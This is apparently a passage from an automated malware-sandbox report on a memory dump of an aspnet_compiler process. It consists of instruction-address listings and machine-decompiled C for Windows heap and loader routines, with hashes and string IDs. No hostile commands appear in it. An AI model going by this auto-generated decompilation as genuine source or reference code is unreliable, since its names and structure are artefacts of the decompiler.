                          0x01419a61
                          0x01419a66
                          0x01419a68
                          0x01461457
                          0x0146145c
                          0x0146145c
                          0x01419a68
                          0x01419a6e
                          0x01419a71
                          0x01419a74
                          0x01419a76
                          0x01461466
                          0x01461469
                          0x01461469
                          0x0146146c
                          0x0146146e
                          0x01461471
                          0x01461474
                          0x01461477
                          0x01461479
                          0x0146159c
                          0x0146159c
                          0x0146159d
                          0x014615a6
                          0x014615ab
                          0x014615ab
                          0x00000000
                          0x014615ab
                          0x0146147f
                          0x01461481
                          0x00000000
                          0x00000000
                          0x0146148a
                          0x0146148d
                          0x01461493
                          0x01461495
                          0x014614c0
                          0x014614c0
                          0x014614c3
                          0x014614c6
                          0x014614c8
                          0x014614cb
                          0x014614cf
                          0x014614f2
                          0x014614f2
                          0x014614f5
                          0x014614f8
                          0x01461501
                          0x01461508
                          0x0146150b
                          0x0146150e
                          0x01461510
                          0x01461513
                          0x01461515
                          0x01461515
                          0x01461518
                          0x01461518
                          0x01461513
                          0x01461521
                          0x01461525
                          0x0146152a
                          0x0146152d
                          0x01461530
                          0x01461532
                          0x01461539
                          0x0146153d
                          0x0146155d
                          0x01461562
                          0x0146153f
                          0x01461555
                          0x0146155a
                          0x01461570
                          0x01461577
                          0x0146157c
                          0x01461582
                          0x01461585
                          0x01461589
                          0x0146158b
                          0x01461592
                          0x01461593
                          0x01461593
                          0x01461589
                          0x01461530
                          0x00000000
                          0x014614f8
                          0x014614d5
                          0x014614da
                          0x014614dc
                          0x00000000
                          0x014614de
                          0x014614e8
                          0x00000000
                          0x014614e8
                          0x01461497
                          0x01461497
                          0x014614a4
                          0x014614a4
                          0x014614a7
                          0x014614a9
                          0x014614ab
                          0x014614ab
                          0x0146149c
                          0x0146149e
                          0x014614a0
                          0x014614b0
                          0x014614b0
                          0x00000000
                          0x014614a2
                          0x014614a2
                          0x00000000
                          0x014614a2
                          0x014614a0
                          0x014614b3
                          0x014614bb
                          0x00000000
                          0x014614bb
                          0x01461495
                          0x01419a7c
                          0x01419a7c
                          0x01419a7f
                          0x01419a7f
                          0x01419a82
                          0x01419a84
                          0x01419a87
                          0x01419a8a
                          0x01419a8d
                          0x01419a8f
                          0x0146166a
                          0x0146166a
                          0x0146166b
                          0x01461674
                          0x00000000
                          0x01461674
                          0x01419a95
                          0x01419a97
                          0x00000000
                          0x00000000
                          0x01419aa0
                          0x01419aa3
                          0x01419aa9
                          0x01419aab
                          0x01419ad7
                          0x01419ad7
                          0x01419ada
                          0x01419add
                          0x01419adf
                          0x01419ae2
                          0x01419ae6
                          0x01419b22
                          0x01419b27
                          0x01419b29
                          0x00000000
                          0x01419b2b
                          0x014615be
                          0x00000000
                          0x014615be
                          0x01419b29
                          0x01419ae8
                          0x01419ae8
                          0x01419aeb
                          0x01419aee
                          0x014615cb
                          0x014615d2
                          0x014615d5
                          0x014615d7
                          0x014615da
                          0x014615dc
                          0x014615dc
                          0x014615dc
                          0x014615da
                          0x014615e5
                          0x014615e9
                          0x014615ee
                          0x014615f1
                          0x014615f3
                          0x014615f9
                          0x01461600
                          0x01461604
                          0x01461624
                          0x01461629
                          0x01461606
                          0x0146161c
                          0x01461621
                          0x01461637
                          0x0146163e
                          0x01461643
                          0x01461649
                          0x0146164c
                          0x01461650
                          0x01461656
                          0x0146165d
                          0x0146165e
                          0x0146165e
                          0x01461650
                          0x014615f3
                          0x01419af4
                          0x01419af7
                          0x01419afc
                          0x01419b00
                          0x01419b04
                          0x01419b08
                          0x01419b14
                          0x014199fe
                          0x01419a04
                          0x01419a07
                          0x00000000
                          0x01419a29
                          0x0146169c
                          0x014616a0
                          0x014616a5
                          0x014616a9
                          0x014616b5
                          0x014616ba
                          0x014616bc
                          0x014616be
                          0x014616c3
                          0x014616c3
                          0x014616bc
                          0x014616c8
                          0x014616cc
                          0x0146181b
                          0x0146181b
                          0x0146181e
                          0x0146181e
                          0x01461821
                          0x01461823
                          0x01461826
                          0x01461829
                          0x0146182c
                          0x0146182e
                          0x01461688
                          0x01461688
                          0x01461689
                          0x0146168b
                          0x0146168c
                          0x0146168d
                          0x0146168f
                          0x01461692
                          0x00000000
                          0x01461692
                          0x01461834
                          0x01461836
                          0x00000000
                          0x00000000
                          0x0146183f
                          0x01461842
                          0x01461848
                          0x0146184a
                          0x01461875
                          0x01461875
                          0x01461878
                          0x0146187b
                          0x0146187d
                          0x01461880
                          0x01461884
                          0x014618a7
                          0x014618a7
                          0x014618aa
                          0x014618ad
                          0x014618b6
                          0x014618bd
                          0x014618c0
                          0x014618c3
                          0x014618c5
                          0x014618c8
                          0x014618ca
                          0x014618ca
                          0x014618cd
                          0x014618cd
                          0x014618c8
                          0x014618d5
                          0x014618da
                          0x014618df
                          0x014618e2
                          0x014618e5
                          0x014618e7
                          0x014618ee
                          0x014618f2
                          0x01461912
                          0x01461917
                          0x014618f4
                          0x0146190a
                          0x0146190f
                          0x01461925
                          0x0146192c
                          0x01461931
                          0x0146193a
                          0x0146193e
                          0x01461940
                          0x01461947
                          0x01461948
                          0x01461948
                          0x0146193e
                          0x014618e5
                          0x0146194f
                          0x01461952
                          0x01461956
                          0x0146195d
                          0x01461961
                          0x0146196d
                          0x00000000
                          0x0146196d
                          0x0146188a
                          0x0146188f
                          0x01461891
                          0x00000000
                          0x00000000
                          0x0146189d
                          0x00000000
                          0x0146189d
                          0x0146184c
                          0x01461859
                          0x01461859
                          0x0146185c
                          0x00000000
                          0x00000000
                          0x01461851
                          0x01461853
                          0x01461855
                          0x01461865
                          0x01461865
                          0x01461866
                          0x01461868
                          0x01461870
                          0x00000000
                          0x01461870
                          0x01461857
                          0x01461857
                          0x0146185e
                          0x00000000
                          0x014616d2
                          0x014616d2
                          0x014616d5
                          0x014616d5
                          0x014616d8
                          0x014616da
                          0x014616dd
                          0x014616e0
                          0x014616e3
                          0x014616e5
                          0x01461808
                          0x01461808
                          0x01461809
                          0x01461812
                          0x01461817
                          0x01461817
                          0x00000000
                          0x01461817
                          0x014616eb
                          0x014616ed
                          0x00000000
                          0x00000000
                          0x014616f6
                          0x014616f9
                          0x014616ff
                          0x01461701
                          0x0146172c
                          0x0146172c
                          0x0146172f
                          0x01461732
                          0x01461734
                          0x01461737
                          0x0146173b
                          0x0146175e
                          0x0146175e
                          0x01461761
                          0x01461764
                          0x0146176d
                          0x01461774
                          0x01461777
                          0x0146177a
                          0x0146177c
                          0x0146177f
                          0x01461781
                          0x01461781
                          0x01461784
                          0x01461784
                          0x0146177f
                          0x0146178c
                          0x01461791
                          0x01461796
                          0x01461799
                          0x0146179c
                          0x0146179e
                          0x014617a5
                          0x014617a9
                          0x014617c9
                          0x014617ce
                          0x014617ab
                          0x014617c1
                          0x014617c6
                          0x014617dc
                          0x014617e3
                          0x014617e8
                          0x014617ee
                          0x014617f1
                          0x014617f5
                          0x014617f7
                          0x014617fe
                          0x014617ff
                          0x014617ff
                          0x014617f5
                          0x0146179c
                          0x00000000
                          0x01461764
                          0x01461741
                          0x01461746
                          0x01461748
                          0x00000000
                          0x00000000
                          0x01461754
                          0x00000000
                          0x01461754
                          0x01461703
                          0x01461710
                          0x01461710
                          0x01461713
                          0x00000000
                          0x00000000
                          0x01461708
                          0x0146170a
                          0x0146170c
                          0x0146171c
                          0x0146171c
                          0x0146171d
                          0x0146171f
                          0x01461727
                          0x00000000
                          0x01461727
                          0x0146170e
                          0x0146170e
                          0x01461715
                          0x00000000
                          0x01461715
                          0x014616cc
                          0x01419a45
                          0x01419a45
                          0x01419a0e
                          0x01419a1c
                          0x01419a23
                          0x0146167e
                          0x0146167f
                          0x01461681
                          0x01461683
                          0x01461684
                          0x00000000
                          0x01461684
                          0x00000000
                          0x01419aad
                          0x01419aad
                          0x01419ab0
                          0x01419ab3
                          0x01419ab3
                          0x01419ab6
                          0x00000000
                          0x00000000
                          0x01419ab8
                          0x01419aba
                          0x01419abc
                          0x01419ac8
                          0x01419ac8
                          0x00000000
                          0x01419abe
                          0x01419abe
                          0x01419ac0
                          0x00000000
                          0x01419ac0
                          0x01419abc
                          0x01419ad2
                          0x00000000
                          0x01419ad2
                          0x01419aab

                          Strings
                          Memory Dump Source
                          • Source File: 00000007.00000002.356845668.00000000013D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 013D0000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_7_2_13d0000_aspnet_compiler.jbxd
                          Similarity
                          • API ID:
                          • String ID: HEAP: $HEAP: Free Heap block %p modified at %p after it was freed$HEAP[%wZ]:
                          • API String ID: 0-3178619729
                          • Opcode ID: caf06210f3d1cd930a1ee7bca32227fa8fafce12e10333cece7ac5c8fdcf1c96
                          • Instruction ID: 995c2841dc8064a559f51e2ebac3b5e349475d85e134e75d5dc04c3e50d22db8
                          • Opcode Fuzzy Hash: caf06210f3d1cd930a1ee7bca32227fa8fafce12e10333cece7ac5c8fdcf1c96
                          • Instruction Fuzzy Hash: D422F1706002469FEB24CF2DC495B7BBBB9EF84B08F18856EE4468B366D734D885CB51
                          Uniqueness

                          Uniqueness Score: -1.00%

                          C-Code - Quality: 67%
                          			E0141B477(signed int __ecx, signed int* __edx) {
                          				signed int _v8;
                          				signed int _v12;
                          				intOrPtr* _v16;
                          				signed int* _v20;
                          				signed int _v24;
                          				char _v28;
                          				signed int _v44;
                          				char _v48;
                          				void* __ebx;
                          				void* __edi;
                          				void* __esi;
                          				void* __ebp;
                          				signed int _t131;
                          				signed char _t134;
                          				signed int _t139;
                          				void* _t141;
                          				signed int* _t143;
                          				signed int* _t144;
                          				intOrPtr* _t147;
                          				char _t160;
                          				signed int* _t163;
                          				signed char* _t164;
                          				intOrPtr _t165;
                          				signed int* _t167;
                          				signed char* _t168;
                          				intOrPtr _t193;
                          				intOrPtr* _t195;
                          				signed int _t203;
                          				signed int _t209;
                          				signed int _t211;
                          				intOrPtr _t214;
                          				intOrPtr* _t231;
                          				intOrPtr* _t236;
                          				signed int _t237;
                          				intOrPtr* _t238;
                          				signed int _t240;
                          				intOrPtr _t241;
                          				char _t243;
                          				signed int _t252;
                          				signed int _t254;
                          				signed char _t259;
                          				signed int _t264;
                          				signed int _t268;
                          				intOrPtr _t277;
                          				unsigned int _t279;
                          				signed int* _t283;
                          				intOrPtr* _t284;
                          				unsigned int _t287;
                          				signed int _t291;
                          				signed int _t293;
                          
                          				_v8 =  *0x14ed360 ^ _t293;
                          				_t223 = __edx;
                          				_v20 = __edx;
                          				_t291 = __ecx;
                          				_t276 =  *__edx;
                          				_t231 = E0141B8E4( *__edx);
                          				_t292 = __ecx + 0x8c;
                          				_v16 = _t231;
                          				if(_t231 == __ecx + 0x8c) {
                          					L38:
                          					_t131 = 0;
                          					L34:
                          					return E0143B640(_t131, _t223, _v8 ^ _t293, _t276, _t291, _t292);
                          				}
                          				if( *0x14e8748 >= 1) {
                          					__eflags =  *((intOrPtr*)(_t231 + 0x14)) -  *__edx;
                          					if(__eflags < 0) {
                          						_t214 =  *[fs:0x30];
                          						__eflags =  *(_t214 + 0xc);
                          						if( *(_t214 + 0xc) == 0) {
                          							_push("HEAP: ");
                          							E013FB150();
                          						} else {
                          							E013FB150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
                          						}
                          						_push("(UCRBlock->Size >= *Size)");
                          						E013FB150();
                          						__eflags =  *0x14e7bc8;
                          						if(__eflags == 0) {
                          							__eflags = 1;
                          							E014B2073(_t223, 1, _t291, 1);
                          						}
                          						_t231 = _v16;
                          					}
                          				}
                          				_t5 = _t231 - 8; // -8
                          				_t292 = _t5;
                          				_t134 =  *((intOrPtr*)(_t292 + 6));
                          				if(_t134 != 0) {
                          					_t223 = (_t292 & 0xffff0000) - ((_t134 & 0x000000ff) << 0x10) + 0x10000;
                          				} else {
                          					_t223 = _t291;
                          				}
                          				_t276 = _v20;
                          				_v28 =  *((intOrPtr*)(_t231 + 0x10));
                          				_t139 =  *(_t291 + 0xcc) ^  *0x14e8a68;
                          				_v12 = _t139;
                          				if(_t139 != 0) {
                          					 *0x14eb1e0(_t291,  &_v28, _t276);
                          					_t141 = _v12();
                          					goto L8;
                          				} else {
                          					_t203 =  *((intOrPtr*)(_t231 + 0x14));
                          					_v12 = _t203;
                          					if(_t203 -  *_t276 <=  *(_t291 + 0x6c) << 3) {
                          						_t264 = _v12;
                          						__eflags = _t264 -  *(_t291 + 0x5c) << 3;
                          						if(__eflags < 0) {
                          							 *_t276 = _t264;
                          						}
                          					}
                          					_t209 =  *(_t291 + 0x40) & 0x00040000;
                          					asm("sbb ecx, ecx");
                          					_t268 = ( ~_t209 & 0x0000003c) + 4;
                          					_v12 = _t268;
                          					if(_t209 != 0) {
                          						_push(0);
                          						_push(0x14);
                          						_push( &_v48);
                          						_push(3);
                          						_push(_t291);
                          						_push(0xffffffff);
                          						_t211 = E01439730();
                          						__eflags = _t211;
                          						if(_t211 < 0) {
                          							L56:
                          							_push(_t268);
                          							_t276 = _t291;
                          							E014BA80D(_t291, 1, _v44, 0);
                          							_t268 = 4;
                          							goto L7;
                          						}
                          						__eflags = _v44 & 0x00000060;
                          						if((_v44 & 0x00000060) == 0) {
                          							goto L56;
                          						}
                          						__eflags = _v48 - _t291;
                          						if(__eflags != 0) {
                          							goto L56;
                          						}
                          						_t268 = _v12;
                          					}
                          					L7:
                          					_push(_t268);
                          					_push(0x1000);
                          					_push(_v20);
                          					_push(0);
                          					_push( &_v28);
                          					_push(0xffffffff);
                          					_t141 = E01439660();
                          					 *((intOrPtr*)(_t291 + 0x20c)) =  *((intOrPtr*)(_t291 + 0x20c)) + 1;
                          					L8:
                          					if(_t141 < 0) {
                          						 *((intOrPtr*)(_t291 + 0x214)) =  *((intOrPtr*)(_t291 + 0x214)) + 1;
                          						goto L38;
                          					}
                          					_t143 =  *( *[fs:0x30] + 0x50);
                          					if(_t143 != 0) {
                          						__eflags =  *_t143;
                          						if(__eflags == 0) {
                          							goto L10;
                          						}
                          						_t144 =  &(( *( *[fs:0x30] + 0x50))[0x89]);
                          						L11:
                          						if( *_t144 != 0) {
                          							__eflags =  *( *[fs:0x30] + 0x240) & 0x00000001;
                          							if(__eflags != 0) {
                          								E014B138A(_t223, _t291, _v28,  *_v20, 2);
                          							}
                          						}
                          						if( *((intOrPtr*)(_t291 + 0x4c)) != 0) {
                          							_t287 =  *(_t291 + 0x50) ^  *_t292;
                          							 *_t292 = _t287;
                          							_t259 = _t287 >> 0x00000010 ^ _t287 >> 0x00000008 ^ _t287;
                          							if(_t287 >> 0x18 != _t259) {
                          								_push(_t259);
                          								E014AFA2B(_t223, _t291, _t292, _t291, _t292, __eflags);
                          							}
                          						}
                          						_t147 = _v16 + 8;
                          						 *((char*)(_t292 + 2)) = 0;
                          						 *((char*)(_t292 + 7)) = 0;
                          						_t236 =  *((intOrPtr*)(_t147 + 4));
                          						_t277 =  *_t147;
                          						_v24 = _t236;
                          						_t237 =  *_t236;
                          						_v12 = _t237;
                          						_t238 = _v16;
                          						if(_t237 !=  *((intOrPtr*)(_t277 + 4)) || _v12 != _t147) {
                          							_push(_t238);
                          							_push(_v12);
                          							E014BA80D(0, 0xd, _t147,  *((intOrPtr*)(_t277 + 4)));
                          							_t238 = _v16;
                          						} else {
                          							_t195 = _v24;
                          							 *_t195 = _t277;
                          							 *((intOrPtr*)(_t277 + 4)) = _t195;
                          						}
                          						if( *(_t238 + 0x14) == 0) {
                          							L22:
                          							_t223[0x30] = _t223[0x30] - 1;
                          							_t223[0x2c] = _t223[0x2c] - ( *(_t238 + 0x14) >> 0xc);
                          							 *((intOrPtr*)(_t291 + 0x1e8)) =  *((intOrPtr*)(_t291 + 0x1e8)) +  *(_t238 + 0x14);
                          							 *((intOrPtr*)(_t291 + 0x1fc)) =  *((intOrPtr*)(_t291 + 0x1fc)) + 1;
                          							 *((intOrPtr*)(_t291 + 0x1f8)) =  *((intOrPtr*)(_t291 + 0x1f8)) - 1;
                          							_t279 =  *(_t238 + 0x14);
                          							if(_t279 >= 0x7f000) {
                          								 *((intOrPtr*)(_t291 + 0x1ec)) =  *((intOrPtr*)(_t291 + 0x1ec)) - _t279;
                          								_t279 =  *(_t238 + 0x14);
                          							}
                          							_t152 = _v20;
                          							_t240 =  *_v20;
                          							_v12 = _t240;
                          							_t241 = _v16;
                          							if(_t279 <= _t240) {
                          								__eflags =  *((intOrPtr*)(_t241 + 0x10)) + _t279 - _t223[0x28];
                          								if( *((intOrPtr*)(_t241 + 0x10)) + _t279 != _t223[0x28]) {
                          									 *_v20 = _v12 + ( *_t292 & 0x0000ffff) * 8;
                          									L26:
                          									_t243 = 0;
                          									 *((char*)(_t292 + 3)) = 0;
                          									_t276 = _t223[0x18];
                          									if(_t223[0x18] != _t223) {
                          										_t160 = (_t292 - _t223 >> 0x10) + 1;
                          										_v24 = _t160;
                          										__eflags = _t160 - 0xfe;
                          										if(_t160 >= 0xfe) {
                          											_push(0);
                          											_push(0);
                          											E014BA80D(_t276, 3, _t292, _t223);
                          											_t160 = _v24;
                          										}
                          										_t243 = _t160;
                          									}
                          									 *((char*)(_t292 + 6)) = _t243;
                          									_t163 =  *( *[fs:0x30] + 0x50);
                          									if(_t163 != 0) {
                          										__eflags =  *_t163;
                          										if( *_t163 == 0) {
                          											goto L28;
                          										}
                          										_t227 = 0x7ffe0380;
                          										_t164 =  &(( *( *[fs:0x30] + 0x50))[0x89]);
                          										goto L29;
                          									} else {
                          										L28:
                          										_t227 = 0x7ffe0380;
                          										_t164 = 0x7ffe0380;
                          										L29:
                          										if( *_t164 != 0) {
                          											_t165 =  *[fs:0x30];
                          											__eflags =  *(_t165 + 0x240) & 0x00000001;
                          											if(( *(_t165 + 0x240) & 0x00000001) != 0) {
                          												__eflags = E01417D50();
                          												if(__eflags != 0) {
                          													_t227 =  &(( *( *[fs:0x30] + 0x50))[0x89]);
                          													__eflags =  &(( *( *[fs:0x30] + 0x50))[0x89]);
                          												}
                          												_t276 = _t292;
                          												E014B1582(_t227, _t291, _t292, __eflags,  *_v20,  *(_t291 + 0x74) << 3,  *_t227 & 0x000000ff);
                          											}
                          										}
                          										_t223 = 0x7ffe038a;
                          										_t167 =  *( *[fs:0x30] + 0x50);
                          										if(_t167 != 0) {
                          											__eflags =  *_t167;
                          											if( *_t167 == 0) {
                          												goto L31;
                          											}
                          											_t168 =  &(( *( *[fs:0x30] + 0x50))[0x8c]);
                          											goto L32;
                          										} else {
                          											L31:
                          											_t168 = _t223;
                          											L32:
                          											if( *_t168 != 0) {
                          												__eflags = E01417D50();
                          												if(__eflags != 0) {
                          													_t223 =  &(( *( *[fs:0x30] + 0x50))[0x8c]);
                          													__eflags =  &(( *( *[fs:0x30] + 0x50))[0x8c]);
                          												}
                          												_t276 = _t292;
                          												E014B1582(_t223, _t291, _t292, __eflags,  *_v20,  *(_t291 + 0x74) << 3,  *_t223 & 0x000000ff);
                          											}
                          											_t131 = _t292;
                          											goto L34;
                          										}
                          									}
                          								}
                          								_t152 = _v20;
                          							}
                          							E0141B73D(_t291, _t223,  *((intOrPtr*)(_t241 + 0x10)) + _v12 + 0xffffffe8, _t279 - _v12, _t292, _t152);
                          							 *_v20 =  *_v20 << 3;
                          							goto L26;
                          						} else {
                          							_t283 =  *(_t291 + 0xb8);
                          							if(_t283 != 0) {
                          								_t190 =  *(_t238 + 0x14) >> 0xc;
                          								while(1) {
                          									__eflags = _t190 - _t283[1];
                          									if(_t190 < _t283[1]) {
                          										break;
                          									}
                          									_t252 =  *_t283;
                          									__eflags = _t252;
                          									_v24 = _t252;
                          									_t238 = _v16;
                          									if(_t252 == 0) {
                          										_t190 = _t283[1] - 1;
                          										__eflags = _t283[1] - 1;
                          										L70:
                          										E0141BC04(_t291, _t283, 0, _t238, _t190,  *(_t238 + 0x14));
                          										_t238 = _v16;
                          										goto L19;
                          									}
                          									_t283 = _v24;
                          								}
                          								goto L70;
                          							}
                          							L19:
                          							_t193 =  *_t238;
                          							_t284 =  *((intOrPtr*)(_t238 + 4));
                          							_t254 =  *((intOrPtr*)(_t193 + 4));
                          							_v24 = _t254;
                          							_t238 = _v16;
                          							if( *_t284 != _t254 ||  *_t284 != _t238) {
                          								_push(_t238);
                          								_push( *_t284);
                          								E014BA80D(0, 0xd, _t238, _v24);
                          								_t238 = _v16;
                          							} else {
                          								 *_t284 = _t193;
                          								 *((intOrPtr*)(_t193 + 4)) = _t284;
                          							}
                          							goto L22;
                          						}
                          					}
                          					L10:
                          					_t144 = 0x7ffe0380;
                          					goto L11;
                          				}
                          			}





















































                          0x0141b486
                          0x0141b48a
                          0x0141b48e
                          0x0141b491
                          0x0141b493
                          0x0141b49a
                          0x0141b49c
                          0x0141b4a2
                          0x0141b4a7
                          0x0141b6fc
                          0x0141b6fc
                          0x0141b6b3
                          0x0141b6c3
                          0x0141b6c3
                          0x0141b4b4
                          0x0146294f
                          0x01462951
                          0x01462957
                          0x0146295d
                          0x01462961
                          0x01462980
                          0x01462985
                          0x01462963
                          0x01462978
                          0x0146297d
                          0x0146298b
                          0x01462990
                          0x01462995
                          0x0146299d
                          0x014629a1
                          0x014629a2
                          0x014629a2
                          0x014629a7
                          0x014629a7
                          0x01462951
                          0x0141b4ba
                          0x0141b4ba
                          0x0141b4bd
                          0x0141b4c2
                          0x0141b6d4
                          0x0141b4c8
                          0x0141b4c8
                          0x0141b4c8
                          0x0141b4cd
                          0x0141b4d0
                          0x0141b4d9
                          0x0141b4df
                          0x0141b4e2
                          0x014629b7
                          0x014629bd
                          0x00000000
                          0x0141b4e8
                          0x0141b4e8
                          0x0141b4ef
                          0x0141b4fa
                          0x0141b703
                          0x0141b709
                          0x0141b70b
                          0x0141b711
                          0x0141b711
                          0x0141b70b
                          0x0141b503
                          0x0141b50c
                          0x0141b511
                          0x0141b514
                          0x0141b519
                          0x014629c5
                          0x014629c7
                          0x014629cc
                          0x014629cd
                          0x014629cf
                          0x014629d0
                          0x014629d2
                          0x014629d7
                          0x014629d9
                          0x014629ee
                          0x014629ee
                          0x014629f4
                          0x014629fa
                          0x01462a01
                          0x00000000
                          0x01462a01
                          0x014629db
                          0x014629df
                          0x00000000
                          0x00000000
                          0x014629e1
                          0x014629e4
                          0x00000000
                          0x00000000
                          0x014629e6
                          0x014629e6
                          0x0141b51f
                          0x0141b51f
                          0x0141b520
                          0x0141b525
                          0x0141b52b
                          0x0141b52d
                          0x0141b52e
                          0x0141b530
                          0x0141b535
                          0x0141b53b
                          0x0141b53d
                          0x01462a07
                          0x00000000
                          0x01462a07
                          0x0141b549
                          0x0141b54e
                          0x01462a12
                          0x01462a15
                          0x00000000
                          0x00000000
                          0x01462a24
                          0x0141b559
                          0x0141b55c
                          0x01462a34
                          0x01462a3b
                          0x01462a4d
                          0x01462a4d
                          0x01462a3b
                          0x0141b566
                          0x0141b56b
                          0x0141b56f
                          0x0141b57b
                          0x0141b582
                          0x01462a57
                          0x01462a5c
                          0x01462a5c
                          0x0141b582
                          0x0141b58b
                          0x0141b58e
                          0x0141b592
                          0x0141b596
                          0x0141b599
                          0x0141b59b
                          0x0141b59e
                          0x0141b5a3
                          0x0141b5a6
                          0x0141b5a9
                          0x01462a66
                          0x01462a67
                          0x01462a73
                          0x01462a78
                          0x0141b5b8
                          0x0141b5b8
                          0x0141b5bb
                          0x0141b5bd
                          0x0141b5bd
                          0x0141b5c4
                          0x0141b5f7
                          0x0141b5f7
                          0x0141b600
                          0x0141b606
                          0x0141b60c
                          0x0141b612
                          0x0141b618
                          0x0141b621
                          0x0141b623
                          0x0141b629
                          0x0141b629
                          0x0141b62c
                          0x0141b62f
                          0x0141b633
                          0x0141b636
                          0x0141b639
                          0x0141b71d
                          0x0141b720
                          0x0141b736
                          0x0141b660
                          0x0141b660
                          0x0141b662
                          0x0141b665
                          0x0141b66a
                          0x0141b6e6
                          0x0141b6e7
                          0x0141b6ea
                          0x0141b6ef
                          0x01462ad1
                          0x01462ad2
                          0x01462ad8
                          0x01462add
                          0x01462add
                          0x0141b6f5
                          0x0141b6f5
                          0x0141b672
                          0x0141b675
                          0x0141b67a
                          0x01462ae5
                          0x01462ae8
                          0x00000000
                          0x00000000
                          0x01462af4
                          0x01462afc
                          0x00000000
                          0x0141b680
                          0x0141b680
                          0x0141b680
                          0x0141b685
                          0x0141b687
                          0x0141b68a
                          0x01462b06
                          0x01462b0c
                          0x01462b13
                          0x01462b1e
                          0x01462b20
                          0x01462b2b
                          0x01462b2b
                          0x01462b2b
                          0x01462b34
                          0x01462b45
                          0x01462b45
                          0x01462b13
                          0x0141b696
                          0x0141b69b
                          0x0141b6a0
                          0x01462b4f
                          0x01462b52
                          0x00000000
                          0x00000000
                          0x01462b61
                          0x00000000
                          0x0141b6a6
                          0x0141b6a6
                          0x0141b6a6
                          0x0141b6a8
                          0x0141b6ab
                          0x01462b70
                          0x01462b72
                          0x01462b7d
                          0x01462b7d
                          0x01462b7d
                          0x01462b86
                          0x01462b97
                          0x01462b97
                          0x0141b6b1
                          0x00000000
                          0x0141b6b1
                          0x0141b6a0
                          0x0141b67a
                          0x0141b722
                          0x0141b722
                          0x0141b655
                          0x0141b65d
                          0x00000000
                          0x0141b5c6
                          0x0141b5c6
                          0x0141b5ce
                          0x01462a83
                          0x01462a97
                          0x01462a97
                          0x01462a9a
                          0x00000000
                          0x00000000
                          0x01462a88
                          0x01462a8a
                          0x01462a8c
                          0x01462a8f
                          0x01462a92
                          0x01462aa1
                          0x01462aa1
                          0x01462aa2
                          0x01462aab
                          0x01462ab0
                          0x00000000
                          0x01462ab0
                          0x01462a94
                          0x01462a94
                          0x00000000
                          0x01462a9c
                          0x0141b5d4
                          0x0141b5d4
                          0x0141b5d6
                          0x0141b5d9
                          0x0141b5de
                          0x0141b5e1
                          0x0141b5e4
                          0x01462ab8
                          0x01462ab9
                          0x01462ac4
                          0x01462ac9
                          0x0141b5f2
                          0x0141b5f2
                          0x0141b5f4
                          0x0141b5f4
                          0x00000000
                          0x0141b5e4
                          0x0141b5c4
                          0x0141b554
                          0x0141b554
                          0x00000000
                          0x0141b554

                          Strings
                          Memory Dump Source
                          • Source File: 00000007.00000002.356845668.00000000013D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 013D0000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_7_2_13d0000_aspnet_compiler.jbxd
                          Similarity
                          • API ID:
                          • String ID: (UCRBlock->Size >= *Size)$HEAP: $HEAP[%wZ]:
                          • API String ID: 0-4253913091
                          • Opcode ID: 664ffe6ff2115ad5c87d272bafa04e5c56a1818902a2350dae5bbb6e2a775de7
                          • Instruction ID: 034c25f85878bf3ffc19d07fe08c958259154fa06993333e7627fc78eab55278
                          • Opcode Fuzzy Hash: 664ffe6ff2115ad5c87d272bafa04e5c56a1818902a2350dae5bbb6e2a775de7
                          • Instruction Fuzzy Hash: D4E1BD70700206AFDB19CF68C894FBABBB5FF48308F1485AAE5169B3A5D770E941CB51
                          Uniqueness

                          Uniqueness Score: -1.00%

                          C-Code - Quality: 83%
                          			E01408794(void* __ecx) {
                          				signed int _v0;
                          				char _v8;
                          				signed int _v12;
                          				void* _v16;
                          				signed int _v20;
                          				intOrPtr _v24;
                          				signed int _v28;
                          				signed int _v32;
                          				signed int _v40;
                          				void* __ebx;
                          				void* __edi;
                          				void* __esi;
                          				void* __ebp;
                          				intOrPtr* _t77;
                          				signed int _t80;
                          				signed char _t81;
                          				signed int _t87;
                          				signed int _t91;
                          				void* _t92;
                          				void* _t94;
                          				signed int _t95;
                          				signed int _t103;
                          				signed int _t105;
                          				signed int _t110;
                          				signed int _t118;
                          				intOrPtr* _t121;
                          				intOrPtr _t122;
                          				signed int _t125;
                          				signed int _t129;
                          				signed int _t131;
                          				signed int _t134;
                          				signed int _t136;
                          				signed int _t143;
                          				signed int* _t147;
                          				signed int _t151;
                          				void* _t153;
                          				signed int* _t157;
                          				signed int _t159;
                          				signed int _t161;
                          				signed int _t166;
                          				signed int _t168;
                          
                          				_push(__ecx);
                          				_t153 = __ecx;
                          				_t159 = 0;
                          				_t121 = __ecx + 0x3c;
                          				if( *_t121 == 0) {
                          					L2:
                          					_t77 =  *((intOrPtr*)(_t153 + 0x58));
                          					if(_t77 == 0 ||  *_t77 ==  *((intOrPtr*)(_t153 + 0x54))) {
                          						_t122 =  *((intOrPtr*)(_t153 + 0x20));
                          						_t180 =  *((intOrPtr*)(_t122 + 0x3a));
                          						if( *((intOrPtr*)(_t122 + 0x3a)) != 0) {
                          							L6:
                          							if(E0140934A() != 0) {
                          								_t159 = E0147A9D2( *((intOrPtr*)( *((intOrPtr*)(_t153 + 0x20)) + 0x18)), 0, 0);
                          								__eflags = _t159;
                          								if(_t159 < 0) {
                          									_t81 =  *0x14e5780; // 0x0
                          									__eflags = _t81 & 0x00000003;
                          									if((_t81 & 0x00000003) != 0) {
                          										_push(_t159);
                          										E01475510("minkernel\\ntdll\\ldrsnap.c", 0x235, "LdrpDoPostSnapWork", 0, "LdrpDoPostSnapWork:Unable to unsuppress the export suppressed functions that are imported in the DLL based at 0x%p.Status = 0x%x\n",  *((intOrPtr*)( *((intOrPtr*)(_t153 + 0x20)) + 0x18)));
                          										_t81 =  *0x14e5780; // 0x0
                          									}
                          									__eflags = _t81 & 0x00000010;
                          									if((_t81 & 0x00000010) != 0) {
                          										asm("int3");
                          									}
                          								}
                          							}
                          						} else {
                          							_t159 = E0140849B(0, _t122, _t153, _t159, _t180);
                          							if(_t159 >= 0) {
                          								goto L6;
                          							}
                          						}
                          						_t80 = _t159;
                          						goto L8;
                          					} else {
                          						_t125 = 0x13;
                          						asm("int 0x29");
                          						_push(0);
                          						_push(_t159);
                          						_t161 = _t125;
